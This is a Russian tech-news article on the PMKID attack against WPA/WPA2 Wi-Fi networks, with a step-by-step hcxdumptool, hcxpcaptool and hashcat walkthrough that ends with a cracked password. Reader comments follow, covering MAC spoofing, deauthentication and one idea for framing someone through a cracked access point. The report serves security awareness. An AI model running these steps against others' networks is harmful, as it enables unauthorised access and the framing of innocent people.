Йенс Штойбе (Jens "atom" Steube), создатель программы для подбора паролей hashcat (https://hashcat.net), представил (https://hashcat.net/forum/thread-7717.html) новую технику атаки на беспроводные сети с аутентификацией на базе механизмов WPA или WPA2. Предложенный метод существенно упрощает получение идентификатора, который затем может быть использован для подбора пароля подключения к беспроводной сети.
Атака применима к любым сетям 802.11i/p/q/r с включенным румингом (поддерживается на большинстве современных точек доступа). Суть метода в возможности получения идентификатора PMKID (Pairwise Master Key Identifier) в составе ответа EAPOL на запрос аутентификации (PMKID указывается в опциональном поле RSN IE (Robust Security Network Information Element)). Наличие PMKID позволяет определить разделяемый ключ PSK (Pre-Shared Key, пароль к беспроводной сети) без непосредственного получения вычисленного на его основе PMK (Pairwise Master Key), передаваемого на этапе согласования соединения при успешной аутентификации нового пользователя. В частности, PMKID вычисляется по формуле "HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA)". Так как MAC-адреса и строка с названием сети изначально известны, не составляет труда применять PMKID вместо PMK в качестве признака успешного подбора пароля.
Атаки по подбору паролей на основе перехваченных кадров не новы, но в отличие от ранее применяемых (https://www.opennet.dev/tips/3025_wpa_wpa2_wifi_aircrackng_ha...) методов новая атака не требует ожидания подключения к сети нового пользователя и сохранения всей активности, связанной с установкой им соединения. Для получения данных, достаточных для начала подбора пароля, новый метод требует перехвата лишь одного кадра, который можно получить в любое время, отправив запрос аутентификации к точке доступа. Подобная особенность существенно упрощает получение данных для начала подбора, но в целом успешность атаки как и раньше зависит от стойкости установленного пароля к подбору по словарю.
Отмечается, что большинство пользователей не утруждают себя установкой стойких к подбору паролей подключения к беспроводной сети или используют генерируемые точкой доступа пароли, которые на первый взгляд являются стойкими, но на деле формируются на основе предсказуемых шаблонов. Подобные пароли достаточно эффективно подбираются при знании информации о производителе точки доступа, которую можно получить, например, проанализировав MAC-адрес и ESSID. Время подбора подобных 10-символьных паролей оценивается примерно в 8 дней на системе с 4 GPU.
Для проведения атаки требуются свежие версии hcxdumptool (https://github.com/ZerBea/hcxdumptool), hcxtools (https://github.com/ZerBea/hcxtools) и hashcat (https://github.com/hashcat/hashcat).
Запускаем hcxdumptool, отправляем запрос к точке доступа для получения PMKID и сохраняем результат в файл в формате pcapng./hcxdumptool -o test.pcapng -i wlp39s0f3u4u5 --enable_status
start capturing (stop with ctrl+c)
INTERFACE:...............: wlp39s0f3u4u5
FILTERLIST...............: 0 entries
MAC CLIENT...............: 89acf0e761f4 (client)
MAC ACCESS POINT.........: 4604ba734d4e (start NIC)
EAPOL TIMEOUT............: 20000
DEAUTHENTICATIONINTERVALL: 10 beacons
GIVE UP DEAUTHENTICATIONS: 20 tries
REPLAYCOUNTER............: 62083
....
[13:29:57 - 011] 89acf0e761f4 -> 4604ba734d4e [ASSOCIATIONREQUEST, SEQUENCE 4]
[13:29:57 - 011] 4604ba734d4e -> 89acf0e761f4 [ASSOCIATIONRESPONSE, SEQUENCE 1206]
[13:29:57 - 011] 4604ba734d4e -> 89acf0e761f4 [FOUND PMKID]
В случае если точка доступа поддерживает отправку PMKID будет выведено сообщение "FOUND PMKID". Из-за помех перехват может не получиться с первого раза, поэтому рекомендуется запускать hcxdumptool в течение приблизительно 10 минут.
Запускаем утилиту hcxpcaptool для преобразования перехваченного дампа из формата pcapng в формат для разбора в hashcat../hcxpcaptool -z test.16800 test.pcapng
start reading from test.pcapng
summary:
--------
file name....................: test.pcapng
file type....................: pcapng 1.0
file hardware information....: x86_64
file os information..........: Linux 4.17.11-arch1
file application information.: hcxdumptool 4.2.0
network type.................: DLT_IEEE802_11_RADIO (127)
endianess....................: little endian
read errors..................: flawless
packets inside...............: 66
skipped packets..............: 0
packets with FCS.............: 0
beacons (with ESSID inside)..: 17
probe requests...............: 1
probe responses..............: 11
association requests.........: 5
association responses........: 5
authentications (OPEN SYSTEM): 13
authentications (BROADCOM)...: 1
EAPOL packets................: 14
EAPOL PMKIDs.................: 11 PMKID(s) written to test.16800
Содержимое записанного файла включает строки вида
"2582a8281bf9d4308d6f5731d0e61c61*4604ba734d4e*89acf0e761f4*ed487162465a774bfba60eb603a39f3a", которые содержат шестнадцатеричные значения PMKID, MAC AP,MAC Station и ESSID.
Дополнительно при запуске hcxpcaptool можно использовать опции "-E", "-I" и '-U" для анализа наличия паролей, идентификаторов и имён пользователей в беспроводном трафике:./hcxpcaptool -E essidlist -I identitylist -U usernamelist -z test.16800 test.pcapng
Запускаем hashcat для подбора пароля (применяется режим 16800):./hashcat -m 16800 test.16800 -a 3 -w 3 '?l?l?l?l?l?lt!'
hashcat (v4.2.0) starting...
OpenCL Platform #1: NVIDIA Corporation
======================================
* Device #1: GeForce GTX 1080, 2028/8112 MB allocatable, 20MCU
* Device #2: GeForce GTX 1080, 2029/8119 MB allocatable, 20MCU
* Device #3: GeForce GTX 1080, 2029/8119 MB allocatable, 20MCU
* Device #4: GeForce GTX 1080, 2029/8119 MB allocatable, 20MCUHashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotatesApplicable optimizers:
* Zero-Byte
* Single-Hash
* Single-Salt
* Brute-Force
* Slow-Hash-SIMD-LOOPMinimum password length supported by kernel: 8
Maximum password length supported by kernel: 63Watchdog: Temperature abort trigger set to 90c
2582a8281bf9d4308d6f5731d0e61c61*4604ba734d4e*89acf0e761f4*ed487162465a774bfba60eb603a39f3a:hashcat!
Session..........: hashcat
Status...........: Cracked
Hash.Type........: WPA-PMKID-PBKDF2
Hash.Target......: 2582a8281bf9d4308d6f5731d0e61c61*4604ba734d4e*89acf...a39f3a
Time.Started.....: Sun Aug 12 12:51:38 2018 (41 secs)
Time.Estimated...: Sun Aug 12 12:52:19 2018 (0 secs)
Guess.Mask.......: ?l?l?l?l?l?lt! [8]
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....: 408.9 kH/s (103.86ms) @ Accel:64 Loops:128 Thr:1024 Vec:1
Speed.Dev.#2.....: 408.6 kH/s (104.90ms) @ Accel:64 Loops:128 Thr:1024 Vec:1
Speed.Dev.#3.....: 412.9 kH/s (102.50ms) @ Accel:64 Loops:128 Thr:1024 Vec:1
Speed.Dev.#4.....: 410.9 kH/s (104.66ms) @ Accel:64 Loops:128 Thr:1024 Vec:1
Speed.Dev.#*.....: 1641.3 kH/s
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 66846720/308915776 (21.64%)
Rejected.........: 0/66846720 (0.00%)
Restore.Point....: 0/11881376 (0.00%)
Candidates.#1....: hariert! -> hhzkzet!
Candidates.#2....: hdtivst! -> hzxkbnt!
Candidates.#3....: gnxpwet! -> gwqivst!
Candidates.#4....: gxhcddt! -> grjmrut!
HWMon.Dev.#1.....: Temp: 81c Fan: 54% Util: 75% Core:1771MHz Mem:4513MHz Bus:1
HWMon.Dev.#2.....: Temp: 81c Fan: 54% Util:100% Core:1607MHz Mem:4513MHz Bus:1
HWMon.Dev.#3.....: Temp: 81c Fan: 54% Util: 94% Core:1683MHz Mem:4513MHz Bus:1
HWMon.Dev.#4.....: Temp: 81c Fan: 54% Util: 93% Core:1620MHz Mem:4513MHz Bus:1URL: https://medium.com/@billbuchanan_27654/the-beginning-of...
Новость: https://www.opennet.dev/opennews/art.shtml?num=49120
боюсь денег потраченных на 4х GeForce GTX 1080 хватит на оплату интернета на 15 лет как минимум. если вы поняли о чем я :)
Да глючная точка доступа явно дешевле, чем 4•1080
А если атакующий не мамкин хацкер и цель не халявный интернет, а ресурсы внутренней сети фирмы?
Это ж какие кретины во внутреннюю сеть с ценными данными по вайфаю пускают ?
Русский бизнес.
Или мамкин админ, который на "аутсорсе" херачит по быстренькой, чтобы бабла словить.А нерусский бизнес как-то по-другому делает?
Думаю это зависит от серьёзности конторы. Если ты Васген с бутиком тухлей, то взлом точки доступа - не самая страшная потеря для твоего бизнеса. Пожарная инспекция больше на взятки заберёт. И серьёзные люди мудохаться с точкой доступа Васгена четыре дня не будут... Должна ли его волновать дырявость WPA2?
Все у кого есть удаленный доступ.
Так как нет способа проверить, вот этот хост с WiFi сидит, или в розетку проводом воткнулся.Да и доступ только к гостевым WiFi тоже много может рассказать.
Например.
Приходит в организацию, представитель другой организации.
Ценные ли данные у этого представителя?
Ценна ли инфа что эти две организации затевают что-то совместное?
Каждый первый примерно. Каждый второй - уж точно.Ноутбуки, смартфоны у всех.
Верно подмечено. Добавлю еще кучу устройств вроде переносных сканеров штрихкодов.
А вот мамкины хацкеры живут в выдуманном мире, где офис каждой второй фирмы имеет защиту уровня правительственного бункера, а все остальные за серьезные конторы не считаются. Ничего, закончат школу, устроятся на работу и перед ними разверзнуться бездны. Окажется, что "правильно" не делают почти нигде и никогда.
ПодтверждаюПоэтому у нас 3 сети.
Одна в которой есть доступ ко внутренним ресурсам.
Вторая для сотрудников (интернет онли).
Третья гостевой доступ в интернет.
Пароли случайные символы от 20+ кроме гостевого.
Записанные на бумажке приклеенной к монитору...
RADIUS, не не слышал
Я скажу даже больше порой данные не такие уже и ценные! Ну сломаете вы wifi внутренний в пицерии, и что? Узнаете рецепт пиццы который написан в меню?
Или скажем взломаете сеть колбасного комбината и таки бездна откроется перед вами в колбасу кладут бумагу! ААА мы все умрем!!! Незнаю как в России, на Украине по тихоньку все выходят из тени и стараются работать в белую, так что даже шантажировать особо не выйдет. А если контора работает в темную то как правило занесли столько денег, что человек который хочет по шантажировать, по поводу черной бухгалтерии, то человечка закроют быстрее чем проведут проверку на конторе.
Для более мение крупных контор даже атаки шифровальщиков не страшны, зашифровало сервер, развернули бекап за 10 минут виртуалки и погнали дальше.
А если wifi подключен к системе управления тэц?
И чо? Вы были хоть раз на более-менее крупной тэц?
Много там вайфая подключенного к управлению котлами и турбинами?Я вот проработал в энергетике 15 лет и знаю. А вы?
Работать надо, а не интернеты читать!
> Работать надо, а не интернеты читать!А вы в таком случае что тут делаете?
А я почему вопрос задал, так просто что-ли?) И давайте не меряться стажем в энергетике - он у меня немного побольше вашего будет.
> сломаете вы wifi внутренний в пицерии, и что? Узнаете рецепт пиццы
> который написан в меню?Конкуренты с удовольствием заплатят за возможность вешать прямо через внутреннюю систему левые заказы оптом, сведения о планах, бухгалтерии, компромат и все такое. Ничего личного, это бизнес.
A в пиццерии есть POS-терминалы по WiFi! ;)
Например, те, чьё начальство арендовало кусок фойе бизнес-центра под стойку ресепшона. Сама фирма занимает одно крыло 3-го этажа, тянуть кабель арендодатель не разрешает, а доступ в корп. сеть девочкам на ресепшоне чтобы сегодня был.
Много кто. В качестве примера можно привести одного известного вендора, в российской штаб-квартире которого вайфай раскинут абсолютно везде, и применяется как основной вариант последней мили для клиентских машин сотрудников.
Наверное, точки доступа компании должны быть изолированы от внутренней сети. Ну, знаете, типа: я подключился к точке доступа, в интернет вижу, а в локальную сеть нет - только таких же оболтусов.
А те точки доступа, что для внутренних сотрудников не должны выплёвывать сигнал на открытую территорию и должны быть доступны только в родных стенах. Силу сигнала то можно отрегулировать.
В общем, вся эта херня со взломами конечно интересна для мамкиных хацкеров, а промышленный взлом с точками доступа к серьёзным конторам, это такая же пустая трата времени, как... пердеть в воду, что ли.А если вы наивный админ, который будет читать все эти новости про уязвимость WPA2, и прочие тонкости, и пытаться закрыть это на программном уровне - мне вас жаль. Просто не используйте этот канал связи, если он не надёжен - вот простая истина.
Вообще, меня удивляют такие ребята, которые пытаются сделать самый безопасный, самый анонимный мессенджер, браузер, точку доступа...
Есть простая древняя мудрость: Замки от добры людей - злых они не остановят.
Для начала попробуй объяснить элекромагнитным волнам, что они должны не выходить за какую-то там территорию. Без экранирования по периметру. Потом подумай о том, что серьезные конторы существуют не в вакууме. В офисы и даже на заводы заходят всевозможные посетители, от курьеров, до клиентов. И все они, о ужас, попадают на внутреннюю территорию. А еще, представь себе, индивидуальное здание под офис могут себе позволить далеко не все, большинство же снимает офис в каком-нибудь центре вместе с десятками других контор. Ну и наконец решение об использовании или неиспользовании wi-fi принимает не админ, админ его исполняет.>Есть простая древняя мудрость: Замки от добры людей - злых они не остановят.
Нет ничего глупее подобных древних "мудростей". Интересно, а дверные замки в своей квартире ты уже убрал?
>Замки от добры людей - злых они не остановят.Гугл - корпорация добра, кстати.
поэтому ее зонды не раздражают, а доставляют наслаждение....
Поняли. Ты считаешь, что получение чужой учетки для доступа в сеть, нужно для доступа к общедоступным ресурсам интернет.Однако сеть это не значит интернет, а чужая учетка это возможность представиться персоной с определенными полномочиями. И т.д.
P.S. "И т.д." - обозначает границы моих знаний.
Зная точку доступа человека, на которого точишь зуб, можно с его точки, где ни будь, анонимно, загрузить картинку (из запрещенных по УК или текст), а потом под собой пожаловаться на нее (только с другого устройства), чтоб нужные люди, обратили на нее внимание и тогда, по идее, хозяину точки, предстоит не приятная беседа (а может и больше), с сотрудниками соответствующих организаций.
Прям странно видеть, что анонимам нужно объяснять, зачем ви-фи ломают... Уж точно не для того, чтобы в ВКшечке за чужой счёт сидеть.
у блин, к тупому бедному соседу Васяну приедет пативен из за того,что соседский крутой и богатый хацкер с 4 Жирафами 1080, взломал Васянов Wi-Fi и с его ip высказал например нашему главстерху кучу гадостей и прочей правды жизни.
Васян сам за это проголосовал
Тут речь о том Васяне, который как раз таки за это и не голосовал
Ну может и не голосовал, но молчаливо согласился. Суть от этого не меняется. Но идея, документированная IBM как best practice больше десяти лет назад на поверхности: /31 на подключение с одним маршрутом до vpn-сервера. Пароль на точку опционален.
/31?! Уверен?.. ;)
Мисион импосибл какой оо прям лол
А в WPA3 не прокатит?
В общем, если раньше надо было запустить пару команд в консоли, чтобы послать deauth подключённому пользователю, то теперь не нужно.Я правильно понимаю, что это вся разница? Так deauth послать вовсе нетрудно. У кого из домашних пользователей включена защита от деаутентификации, поднимите руки?
802.11w который в том числе защищает от deauth в openwrt есть давно и у меня давно включен.Тут суть скорее в том что к сети на момент скана никто не должен быть изначально подключен и может не быть активного трафика. На сколько я понял PMKID можно получить без какой либо авторизации просто при попытке подключения к сети.
>> в openwrt есть давноДавайте различать "в openwrt" и "в драйвере". В openwrt есть драйверы, в которых этого нет
Как насчёт eap-tls?
Тоже интересно.Мимо-шизик с wpa-eap дома.
Ты ещё небось и руки моешь перед едой? Точно шизик!
Если компания маломальски серьёзная то макии используемых устройств будут в базе(кого подключать а кого нет). И доступы соответственно к ресурсам тоже будут разграничены :-)
Ну и появление нового устройства в арп листе должно заставить охрану начать суетится.
Ну да, MAC ведь ну никак нельзя подделать. Это запрещает религия тех, кто доступ раздает по mac адресам. И мне бы хотелось посмотреть на контору в которой охрана мониторит mac адреса и начинает кипишь при появлении нового.
Заходим в компанию связанную с военкой или другую подобную где участвует гостайна, и начинаем брутить...
Далее нам расскажут про религию смены маков и т.д ;)Понятно что бутик Армэна это просто супер серьёзная контора ))))
А MAC где брать прикажете? Или надо для начала украсть у кого то ноутбук или планшет?
Для Wi-Fi сети MAC адрес идёт в пакетах без шифрования в не зависимости от того как защищена сеть. Так что достаточно просто немного послушать трафик тем же airmon-ng для сбора всех адресов клиентов которые подключены к сети. Никакой физический доступ к оборудованию клиентов не нужен.
А если нет поддержки managed frame protection то клиента можно просто выкинуть из сети и занять его место.
Введите команду arp.
>Ну и появление нового устройства в арп листе должно заставить охрану начать суетится.Колонка воскресного юмора :)
> Если компания маломальски серьёзная то макии используемых устройств будут в базе(кого подключать а кого нет)🛋
Странный критерий сереьзности компании.Как раз в серьезной количество станций в wifi сети больше 2-3 десятков, и сопровождать базу их MAC-ов просто неудобно.
А вот EAP нормально приготовленный - это вполне себе признак. При этом, как на wifi разведённый, так и на проводных портах уровня доступа.
Вообще-то перевод hcxdumptool wifi устройство должно быть переведено в режим monitor.
А так норм перепечатка с хабра угу.
Реально какой лошара будет такое делать?
ломайте, я даже дам подсказку -- 26 символов.
А хеш от него какой длины хранится? А то, если 128 бит, то наверное, в пределах 16 символов есть коллизия, которая покороче ваших 26, а для входа тоже прокатывает. Но Вы про нее не знаете. :)
Хороший вопрос. Используется aes ccm и tkip, вроде оба 128 бит?
Однако, 16 символов тоже не мало..
М-да... После новости задумался, и от греха подальше поставил на точку whitelist MAC адресов и пароль усложнил.
>М-да... После новости задумался, и от греха подальшеКак в анекдоте -
"
Век живи - век учись, подумал он и переложил серебряный портсигар из кармана брюк в нагрудный...
">поставил на точку whitelist MAC адресов и пароль усложнил.
whitelist MAC адресов не является защитой.
усложнение пароля - защита весьма условная...
> Время подбора подобных 10-символьных паролей оценивается примерно в 8 дней на системе с 4 GPU.Ну пусть попробует подобрать мой 32х-символьный - удачи, чо.
Я бы подобрал, спасибо Амазону за аренду GPU по низким ценам. Но у тебя же нет ничего интересного. А даже если и есть, то проще бейсбольной битой по голени и ты сам всё расскажешь.
>> 32х-символьный
> Я бы подобрал, спасибо Амазону за аренду GPU по низким ценам.
> НоНо прогуливать математику-комбинаторику не следовало. Тогда бы мог прикинуть, с какой скоростью нужно перебирать 32^32/2 комбинаций, чтобы подобрать за приемлимое время.
> проще бейсбольной битой по голени и ты сам всё расскажешь.
С голой битой против лома? Ох уж эти теоретики …
Ну вот еще, зачем так много. Достаточно подобрать любой длины, который будет генерить тот же хеш.
Учитывая, что хеш гораздо короче, там может коллизия с паролем типа "1" будет.
+ SS ^)
новость нулевой пользы
Как и комментарии к новости. Делай выводы.